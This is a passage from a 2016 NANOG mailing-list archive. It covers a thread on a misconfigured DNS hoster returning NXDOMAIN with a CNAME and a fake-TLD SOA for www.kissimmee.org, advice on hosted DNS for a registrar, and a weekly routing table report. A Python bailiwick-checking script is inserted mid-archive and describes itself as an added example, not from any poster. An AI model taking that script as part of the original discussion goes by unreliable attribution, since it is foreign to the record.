Named would > as well except for the number of DNS hosters that do this sort of > garbage. Named just sees the CNAME and stops processing the message > after that. > > Mark > Thanks for the replies Mark and Bill. I think it's fair to say that most DNS servers have at one time or another hosted a zone they were not authoritative for according to the DNS tree, as simple as a customer leaving without notice, cruft, split view incorrectly configured, etc. In any event, windows is accepting the negative answer, BIND is rejecting it and going forward with resolving the CNAME, successfully. Joe From marka at isc.org Wed Aug 10 23:24:50 2016 From: marka at isc.org (Mark Andrews) Date: Thu, 11 Aug 2016 09:24:50 +1000 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: Your message of "Wed, 10 Aug 2016 19:10:14 -0400." <57ABB456.5020003@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> <20160810225852.531FD5061639@rock.dv.isc.org> <57ABB456.5020003@ttec.com> Message-ID: <20160810232450.3290450619EA@rock.dv.isc.org> In message <57ABB456.5020003 at ttec.com>, Joe Maimon writes: > > > Mark Andrews wrote: > > > > > Nameresolve.com's servers are returning answers that can be seen > > as a cache poisoning attempt. They are NOT authoritative for > > ".hosting" but have been configured as if they are. This is a big > > NO NO. You don't configure yourself as authoritative for a zone > > that has not been delegated to you and in particular you don't > > configure yourself as authoritative for "." or a TLD. > > > > Windows 2008 is quite correct in rejecting this answer. Named would > > as well except for the number of DNS hosters that do this sort of > > garbage. Named just sees the CNAME and stops processing the message > > after that. > > > > Mark > > > > Thanks for the replies Mark and Bill. 
> > I think it's fair to say that most DNS servers have at one time or > another hosted a zone they were not authoritative for according to the > DNS tree, as simple as a customer leaving without notice, cruft, split > view incorrectly configured, etc. Having the odd leaf zone left over doesn't usually cause operational problems. You have to be very unlucky to be delegated a zone that has a CNAME that points into the left over leaf zone. In this case there is a fake TLD zone. This isn't a left over zone. This is a DNS hoster not understanding the DNS and the implications of their operational decisions. People forget nameservers return negative existence answers and that they need to be as valid as the positive existence answers. > In any event, windows is accepting the negative answer, BIND is > rejecting it and going forward with resolving the CNAME, successfully. > > Joe -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From andy at newslink.com Thu Aug 11 03:29:15 2016 From: andy at newslink.com (Andy Ringsmuth) Date: Wed, 10 Aug 2016 22:29:15 -0500 Subject: Hosting recommendations Message-ID: <34B920F4-E326-4BD6-B7B1-652C827903BB@newslink.com> Fellow NANOGers, I realize the list rules prohibit people advertising/pushing their own products or companies, so I hope this doesn't break that rule by asking. I'd like some recommendations for a solid hosting provider. Nothing hugely extensive. About 50 IMAP email users, basic web hosting for a few domains, some mailman lists and that's about it. I've had us with our current host for several years but their e-mail infrastructure has been increasingly unreliable the last couple years. I don't really want to go through the headache of switching providers but if it means less problems down the road, I'll definitely do it. I have self-hosted in the past but it was a big enough challenge that I won't go that route again. 
So, what do y'all recommend for a solid provider? Thank you in advance! ---- Andy Ringsmuth andy at newslink.com News Link - Manager Travel, Technology & Facilities 2201 Winthrop Rd., Lincoln, NE 68502-4158 (402) 475-6397 (402) 304-0083 cellular From dot at dotat.at Thu Aug 11 10:42:40 2016 From: dot at dotat.at (Tony Finch) Date: Thu, 11 Aug 2016 11:42:40 +0100 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB6CE6.7040403@ttec.com> References: <57AB6CE6.7040403@ttec.com> Message-ID: Joe Maimon wrote: > www.kissimmee.org > > Windows appears to believe the rfc2308 type 2 response, RFC 2308 isn't relevant to this domain. The responses aren't NXDOMAIN, so section 2.1 doesn't apply, and the response includes answers, so section 2.2 doesn't apply. Tony. -- f.anthony.n.finch http://dotat.at/ - I xn--zr8h punycode Fisher, German Bight: South, veering west or southwest, 4 or 5, increasing 6 at times. Slight or moderate. Occasional rain. Good, occasionally poor. From dot at dotat.at Thu Aug 11 10:45:46 2016 From: dot at dotat.at (Tony Finch) Date: Thu, 11 Aug 2016 11:45:46 +0100 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: William Herrin wrote: > > Oh! I missed that. ns*.nameresolve.com, the authoritative name servers > for kissimmee.org, are saying NXDOMAIN for www.kissimmee.org. Any idea > what DNS server nameresolve.com uses? Because that's... wow. Er, me too, headdesk. NXDOMAIN with an answer?! $ fpdns ns2.yourhostingaccount.com. fingerprint (ns2.yourhostingaccount.com., 65.254.254.155): Unlogic Eagle DNS 1.0 -- 1.0.1 [New Rules] Tony. -- f.anthony.n.finch http://dotat.at/ - I xn--zr8h punycode Humber, Thames, Dover: West or southwest 4 or 5, increasing 6 at times. Slight or moderate. Occasional rain at first. Good, occasionally poor at first. 
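The response shape discussed in this thread (NXDOMAIN rcode, a CNAME answer, and an SOA for a zone the server was never delegated), run through a simple bailiwick check. This is an added example, not code from any poster and not BIND's or Windows' actual logic; the function names, the result keys and the second sample response are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Response quoted in the thread (answer from 66.96.142.146), one record per line.
THREAD_RESPONSE = """\
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14318
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.kissimmee.org. IN A
;; ANSWER SECTION:
www.kissimmee.org. 3600 IN CNAME kissimmee-fl.vts.hosting.
;; AUTHORITY SECTION:
hosting. 3600 IN SOA ns2.nshosts.com. info.webstrikesolutions.com.hosting. 1089178331 900 3600 604800 3600
"""

# Constructed for contrast: a well-formed NXDOMAIN for a name inside the zone.
CONSTRUCTED_CLEAN = """\
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;nosuch.kissimmee.org. IN A
;; AUTHORITY SECTION:
kissimmee.org. 3600 IN SOA ns1.example. hostmaster.example. 1 900 3600 604800 3600
"""


@dataclass
class RR:
    owner: str
    rtype: str
    rdata: list


@dataclass
class Response:
    status: str = ""
    flags: set = field(default_factory=set)
    qname: str = ""
    answer: list = field(default_factory=list)
    authority: list = field(default_factory=list)


def norm(name):
    """Lower-case a domain name and force exactly one trailing dot."""
    return name.lower().rstrip(".") + "."


def in_bailiwick(name, zone):
    """True if name is at or below zone (both already normalised)."""
    return zone == "." or name == zone or name.endswith("." + zone)


def parse_dig(text):
    """Parse header, question, answer and authority from dig-style output."""
    resp, section = Response(), None
    for line in (raw.strip() for raw in text.splitlines()):
        status = re.search(r"status: (\w+)", line)
        if line.startswith(";;") and status:
            resp.status = status.group(1)
        elif line.startswith(";; flags:"):
            resp.flags = set(line.split(":")[1].split(";")[0].split())
        elif line.startswith(";;") and line.endswith("SECTION:"):
            section = line[2:].split()[0]
        elif line.startswith(";") and not line.startswith(";;") and section == "QUESTION":
            resp.qname = norm(line[1:].split()[0])
        elif line and not line.startswith(";") and section in ("ANSWER", "AUTHORITY"):
            parts = line.split()
            if len(parts) >= 5:  # owner ttl class type rdata...
                rr = RR(norm(parts[0]), parts[3], parts[4:])
                getattr(resp, section.lower()).append(rr)
    return resp


def audit(resp, delegated_zone):
    """Check a response from a server that was delegated only delegated_zone."""
    zone = norm(delegated_zone)
    findings, accepted, soas, target = [], [], [], resp.qname
    for rr in resp.answer:
        if not in_bailiwick(rr.owner, zone):
            findings.append(("answer-out-of-bailiwick", rr.owner))
            continue
        accepted.append(rr)
        if rr.rtype == "CNAME" and rr.owner == target:
            target = norm(rr.rdata[0])  # follow the alias chain
    for rr in resp.authority:
        if not in_bailiwick(rr.owner, zone):
            findings.append(("authority-out-of-bailiwick", rr.owner))
        elif rr.rtype == "SOA":
            soas.append(rr)
    nxdomain = resp.status == "NXDOMAIN"
    foreign = not in_bailiwick(target, zone)  # denied name lies outside the zone
    if nxdomain and foreign:
        findings.append(("nxdomain-for-out-of-bailiwick-name", target))
    return {
        "status": resp.status,
        "findings": findings,
        "accepted": accepted,  # records the server is entitled to assert
        "negative_cacheable": nxdomain and not foreign
        and any(in_bailiwick(target, s.owner) for s in soas),
        "next_query": target if foreign else None,  # resolve this from the root
    }


if __name__ == "__main__":
    for label, text in (("thread", THREAD_RESPONSE), ("clean", CONSTRUCTED_CLEAN)):
        result = audit(parse_dig(text), "kissimmee.org")
        print(label, result["findings"], result["negative_cacheable"], result["next_query"])
```

The delegated zone passed to `audit` is the one named in the referral from the parent (here the `kissimmee.org` NS set returned by the org servers in the trace).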
From jmaimon at ttec.com Thu Aug 11 12:39:24 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Thu, 11 Aug 2016 08:39:24 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: <57AC71FC.7080507@ttec.com> Tony Finch wrote: > Joe Maimon wrote: > >> www.kissimmee.org >> >> Windows appears to believe the rfc2308 type 2 response, > > RFC 2308 isn't relevant to this domain. The responses aren't NXDOMAIN, so > section 2.1 doesn't apply, and the response includes answers, so section > 2.2 doesn't apply. > > Tony. > We must be reading different things. NXDOMAIN RESPONSE: TYPE 2. Header: RDCODE=NXDOMAIN Query: AN.EXAMPLE. A Andrews Standards Track [Page 3] RFC 2308 DNS NCACHE March 1998 Answer: AN.EXAMPLE. CNAME TRIPPLE.XX. Authority: XX. SOA NS1.XX. HOSTMASTER.NS1.XX. .... Additional: c:\Documents and Settings\joe.JOE.000>c:\programs\bind\bin\dig.exe www.kissimmee .org @ns1.nameresolve.com ; <<>> DiG 9.10a2 <<>> www.kissimmee.org @ns1.nameresolve.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36437 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1680 ;; QUESTION SECTION: ;www.kissimmee.org. IN A ;; ANSWER SECTION: www.kissimmee.org. 3600 IN CNAME kissimmee-fl.vts.hosting. ;; AUTHORITY SECTION: hosting. 3600 IN SOA ns2.nshosts.com. info.webstrikes olutions.com.hosting. 1089178331 900 3600 604800 3600 ;; Query time: 62 msec ;; SERVER: 66.96.142.146#53(66.96.142.146) ;; WHEN: Thu Aug 11 08:36:59 Eastern Daylight Time 2016 ;; MSG SIZE rcvd: 163 From ryan at finnesey.com Fri Aug 12 05:56:51 2016 From: ryan at finnesey.com (Ryan Finnesey) Date: Fri, 12 Aug 2016 05:56:51 +0000 Subject: DNS Services for a registrar Message-ID: We need to provide DNS services for domains we offer as a registrar. 
We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. Cheers Ryan From jared at puck.nether.net Fri Aug 12 12:28:10 2016 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 12 Aug 2016 08:28:10 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: > On Aug 12, 2016, at 1:56 AM, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? My big concern would be the current lack of v6 support on AWS for such a deployment. I suspect it's coming soon as they just announced IPv6 support on S3 yesterday. How many zones do you expect to scale to? I've been running a free secondary DNS service for many years on BIND, but moving to something else makes a lot of sense these days. Do you have a lot of DNS server experience in-house? There's a lot of little things that come up along the way. You really should consider being subscribed to the dns-operations list and asking there as well. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. I like having good control over my own fate, so would prefer running my own service, but plenty of people use hosted DNS at their providers, and there's plenty of folks who can sell you a service from dyn to neustar with their own cost models. I would either provide a completely opaque service offering where you retain control of the NS records so can easily move/renumber as you scale up, or consider a solution which can be expanded globally as needed over time. I'm able to host ~10k zones in my free secondary service without issues, but to "take the next step" requires decoupling 20 years of history I'm dragging around. 
- Jared From marka at isc.org Fri Aug 12 13:14:41 2016 From: marka at isc.org (Mark Andrews) Date: Fri, 12 Aug 2016 23:14:41 +1000 Subject: DNS Services for a registrar In-Reply-To: Your message of "Fri, 12 Aug 2016 08:28:10 -0400." References: Message-ID: <20160812131441.DCB4E50A3B67@rock.dv.isc.org> And regardless of what / who you choose make sure that they are running RFC compliant servers. There are a lot of DNS providers that feel they don't need to use RFC compliant servers which makes problems for all the resolver vendors out there. It also makes it hard to deploy new features that depend on servers actually behaving as specified in the RFCs. Most of the problems I see would take 10 minutes for a developer to fix if they are not already fixed and just require a more recent version to be installed. For a list of some of the things you should be checking for see https://tools.ietf.org/html/draft-ietf-dnsop-no-response-issue-03 You can also run the EDNS compliance checker at https://ednscomp.isc.org Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From beckman at angryox.com Fri Aug 12 13:41:13 2016 From: beckman at angryox.com (Peter Beckman) Date: Fri, 12 Aug 2016 09:41:13 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up time in the last 10-12 years excluding an 8 hour period 4-5 years ago where they got DDOSed, no issues since), very affordable. #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 Has been #1 several months this year. Beckman On Fri, 12 Aug 2016, Ryan Finnesey wrote: > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? 
> > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > > --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- From mehmet at akcin.net Fri Aug 12 14:24:54 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 07:24:54 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Peter, That test is meaningless as it is from only few locations which seems to overlap with those who scored well. I would suggest using that as a base to compare speed. Mehmet On Friday, August 12, 2016, Peter Beckman wrote: > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We >> were discussing internally the different options for the deployment. Does >> anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure >> DNS or AWS Route 53. 
>> >> Cheers >> Ryan >> >> >> > ------------------------------------------------------------ > --------------- > Peter Beckman Internet Guy > beckman at angryox.com > http://www.angryox.com/ > ------------------------------------------------------------ > --------------- > From jlk at thrashyour.com Fri Aug 12 14:44:19 2016 From: jlk at thrashyour.com (John Kinsella) Date: Fri, 12 Aug 2016 07:44:19 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> Also a big fan of DNS Made easy, but I wish they'd add DNSSEC already. I'm happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month. If you're worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and It might be worth a few minutes pondering just using Amazon's Route53 instead of running the DNS server yourself. I haven't looked at how the cost compares. > On Aug 12, 2016, at 6:41 AM, Peter Beckman wrote: > > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > >> We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. 
>> >> Cheers >> Ryan >> >> > > --------------------------------------------------------------------------- > Peter Beckman Internet Guy > beckman at angryox.com http://www.angryox.com/ > --------------------------------------------------------------------------- From bill at herrin.us Fri Aug 12 15:33:59 2016 From: bill at herrin.us (William Herrin) Date: Fri, 12 Aug 2016 11:33:59 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: On Fri, Aug 12, 2016 at 1:56 AM, Ryan Finnesey wrote: > Does anyone see a down side to using IaaS on AWS and Azure [for DNS]? Latency is critical for DNS. Literally everything else an application does stalls behind completion of the DNS lookups. Everything else being equal, virtualized infrastructure will always exhibit higher latency than bare metal. Always. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. I don't know their implementations well. I would hope they run the underlying DNS servers on bare metal rather than leveraging their VM infrastructure. I would worry that they offer all sorts of extra features which are -single source-. If you pick Route 53 and your customers get used to those features you may find yourself locked in at Amazon's mercy. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From keiths at neilltech.com Fri Aug 12 15:36:11 2016 From: keiths at neilltech.com (Keith Stokes) Date: Fri, 12 Aug 2016 15:36:11 +0000 Subject: DNS Services for a registrar In-Reply-To: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> Message-ID: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you'll pay $500/month. 
You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. You might also consider running dedicated servers in each of AWS and Azure to avoid a single-provider failure. On Aug 12, 2016, at 9:44 AM, John Kinsella wrote: Also a big fan of DNS Made easy, but I wish they'd add DNSSEC already. I'm happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month. If you're worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and It might be worth a few minutes pondering just using Amazon's Route53 instead of running the DNS server yourself. I haven't looked at how the cost compares. On Aug 12, 2016, at 6:41 AM, Peter Beckman wrote: I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up time in the last 10-12 years excluding an 8 hour period 4-5 years ago where they got DDOSed, no issues since), very affordable. #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 Has been #1 several months this year. Beckman On Fri, 12 Aug 2016, Ryan Finnesey wrote: We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. 
Cheers Ryan --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- --- Keith Stokes From alter3d at alter3d.ca Fri Aug 12 16:29:57 2016 From: alter3d at alter3d.ca (Peter Kristolaitis) Date: Fri, 12 Aug 2016 12:29:57 -0400 Subject: DNS Services for a registrar In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: On 2016-08-12 11:36 AM, Keith Stokes wrote: > Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you'll pay $500/month. If you had 1000 domains, you'd pay $110/month, not $500. The first 25 domains at $0.50/month each, after that it's $0.10. And that's based on the publicly available pricing -- they have special pricing if you're hosting >500 domains. Including queries, if each hosted domain had a million queries a month, your total bill would be $310. That's probably a high estimate because it doesn't account for the >500 domain special pricing and your average registrar-hosted domain doesn't get anywhere near 1M queries a month. Your actual bill would probably be significantly less. > You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. If you were to use c4.large instances, it would cost just under $400/month to have 6 instances spread across 2 regions with 3 AZs each, after instances, load balancers and bandwidth. That's assuming you do the discounted 1-year, no-upfront-fee term on the instances. And you're still not as redundant or fast as Route 53, which is anycast from way more than 6 places. 
The math gets a little trickier when we start looking at labour costs for both initial development of your platform and ongoing maintenance, but from strictly an infrastructure cost perspective, I don't think the claim that it would cost "far less" to run your own infrastructure is necessarily true for a registrar-doing-hosting scenario. From keiths at neilltech.com Fri Aug 12 17:01:45 2016 From: keiths at neilltech.com (Keith Stokes) Date: Fri, 12 Aug 2016 17:01:45 +0000 Subject: DNS Services for a registrar In-Reply-To: References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: Much better math than mine. I pulled from memory and didn't know the discount @ 25. I'm only running a half-dozen domains in Route53 and the rest are hosted internally. You could probably use less than a c4.large too. On Aug 12, 2016, at 11:29 AM, Peter Kristolaitis wrote: On 2016-08-12 11:36 AM, Keith Stokes wrote: Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you'll pay $500/month. If you had 1000 domains, you'd pay $110/month, not $500. The first 25 domains at $0.50/month each, after that it's $0.10. And that's based on the publicly available pricing -- they have special pricing if you're hosting >500 domains. Including queries, if each hosted domain had a million queries a month, your total bill would be $310. That's probably a high estimate because it doesn't account for the >500 domain special pricing and your average registrar-hosted domain doesn't get anywhere near 1M queries a month. Your actual bill would probably be significantly less. You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. 
If you were to use c4.large instances, it would cost just under $400/month to have 6 instances spread across 2 regions with 3 AZs each, after instances, load balancers and bandwidth. 
That's assuming you do the discounted 1-year, no-upfront-fee term on the instances. And you're still not as redundant or fast as Route 53, which is anycast from way more than 6 places. The math gets a little trickier when we start looking at labour costs for both initial development of your platform and ongoing maintenance, but from strictly an infrastructure cost perspective, I don't think the claim that it would cost "far less" to run your own infrastructure is necessarily true for a registrar-doing-hosting scenario. --- Keith Stokes From cscora at apnic.net Fri Aug 12 18:01:40 2016 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 13 Aug 2016 04:01:40 +1000 (AEST) Subject: Weekly Routing Table Report Message-ID: <20160812180140.C9611AB457@thyme.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . 
Routing Table Report 04:00 +10GMT Sat 13 Aug, 2016 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 605983 Prefixes after maximum aggregation (per Origin AS): 219519 Deaggregation factor: 2.76 Unique aggregates announced (without unneeded subnets): 296865 Total ASes present in the Internet Routing Table: 54571 Prefixes per ASN: 11.10 Origin-only ASes present in the Internet Routing Table: 36463 Origin ASes announcing only one prefix: 15482 Transit ASes present in the Internet Routing Table: 6484 Transit-only ASes present in the Internet Routing Table: 174 Average AS path length visible in the Internet Routing Table: 4.3 Max AS path length visible: 54 Max AS path prepend of ASN ( 55644) 51 Prefixes from unregistered ASNs in the Routing Table: 65 Unregistered ASNs in the Routing Table: 16 Number of 32-bit ASNs allocated by the RIRs: 15008 Number of 32-bit ASNs visible in the Routing Table: 11624 Prefixes from 32-bit ASNs in the Routing Table: 46222 Number of bogon 32-bit ASNs visible in the Routing Table: 27 Special use prefixes present in the Routing Table: 0 Prefixes being announced from unallocated address space: 366 Number of addresses announced to Internet: 2823070052 Equivalent to 168 /8s, 68 /16s and 161 /24s Percentage of available address space announced: 76.3 Percentage of allocated address space announced: 76.3 Percentage of available address space allocated: 100.0 Percentage of address space in use by end-sites: 98.2 Total number of prefixes smaller than registry allocations: 197230 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 155411 Total APNIC prefixes after maximum aggregation: 42917 APNIC Deaggregation factor: 3.62 Prefixes being announced from the APNIC address blocks: 168363 Unique aggregates announced from the APNIC address blocks: 68727 APNIC Region origin ASes 
present in the Internet Routing Table: 5192 APNIC Prefixes per ASN: 32.43 APNIC Region origin ASes announcing only one prefix: 1174 APNIC Region transit ASes present in the Internet Routing Table: 929 Average APNIC Region AS path length visible: 4.4 Max APNIC Region AS path length visible: 54 Number of APNIC region 32-bit ASNs visible in the Routing Table: 2288 Number of APNIC addresses announced to Internet: 759458116 Equivalent to 45 /8s, 68 /16s and 105 /24s APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 63488-64098, 64297-64395, 131072-137529 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 182946 Total ARIN prefixes after maximum aggregation: 89491 ARIN Deaggregation factor: 2.04 Prefixes being announced from the ARIN address blocks: 188570 Unique aggregates announced from the ARIN address blocks: 88668 ARIN Region origin ASes present in the Internet Routing Table: 16255 ARIN Prefixes per ASN: 11.60 ARIN Region origin ASes announcing only one prefix: 5747 ARIN Region transit ASes present in the Internet Routing Table: 1702 Average ARIN Region AS path length visible: 3.8 Max ARIN Region AS path length visible: 23 Number of ARIN region 32-bit ASNs visible in the Routing Table: 1388 Number of ARIN addresses announced to Internet: 1105635168 Equivalent to 65 /8s, 230 /16s and 167 /24s ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 
                       7723-8191, 10240-12287, 13312-15359, 16384-17407
                       18432-20479, 21504-23551, 25600-26591, 26624-27647,
                       29696-30719, 31744-33791
                       35840-36863, 39936-40959, 46080-47103
                       53248-55295, 62464-63487, 64198-64296, 393216-397212
ARIN Address Blocks    3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8,
                       15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8,
                       24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8,
                       38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8,
                       54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8,
                       68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8,
                       96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8,
                       128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8,
                       137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8,
                       147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8,
                       159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8,
                       168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8,
                       198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8,
                       214/8, 215/8, 216/8,

RIPE Region Analysis Summary
----------------------------

Prefixes being announced by RIPE Region ASes: 145178
Total RIPE prefixes after maximum aggregation: 71583
RIPE Deaggregation factor: 2.03
Prefixes being announced from the RIPE address blocks: 155202
Unique aggregates announced from the RIPE address blocks: 96113
RIPE Region origin ASes present in the Internet Routing Table: 18111
RIPE Prefixes per ASN: 8.57
RIPE Region origin ASes announcing only one prefix: 7832
RIPE Region transit ASes present in the Internet Routing Table: 3026
Average RIPE Region AS path length visible: 4.4
Max RIPE Region AS path length visible: 27
Number of RIPE region 32-bit ASNs visible in the Routing Table: 4998
Number of RIPE addresses announced to Internet: 706273664
Equivalent to 42 /8s, 24 /16s and 225 /24s
RIPE AS Blocks         1877-1901, 2043, 2047, 2107-2136, 2585-2614
(pre-ERX allocations)  2773-2822, 2830-2879, 3154-3353, 5377-5631
                       6656-6911, 8192-9215, 12288-13311, 15360-16383
                       20480-21503, 24576-25599, 28672-29695
                       30720-31743, 33792-35839, 38912-39935
                       40960-45055, 47104-52223, 56320-58367
                       59392-61439, 61952-62463, 64396-64495
                       196608-207259
RIPE Address Blocks    2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8,
                       78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8,
                       87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8,
                       109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8,
                       193/8, 194/8, 195/8, 212/8, 213/8, 217/8,

LACNIC Region Analysis Summary
------------------------------

Prefixes being announced by LACNIC Region ASes: 61758
Total LACNIC prefixes after maximum aggregation: 12273
LACNIC Deaggregation factor: 5.03
Prefixes being announced from the LACNIC address blocks: 77094
Unique aggregates announced from the LACNIC address blocks: 36939
LACNIC Region origin ASes present in the Internet Routing Table: 2470
LACNIC Prefixes per ASN: 31.21
LACNIC Region origin ASes announcing only one prefix: 555
LACNIC Region transit ASes present in the Internet Routing Table: 581
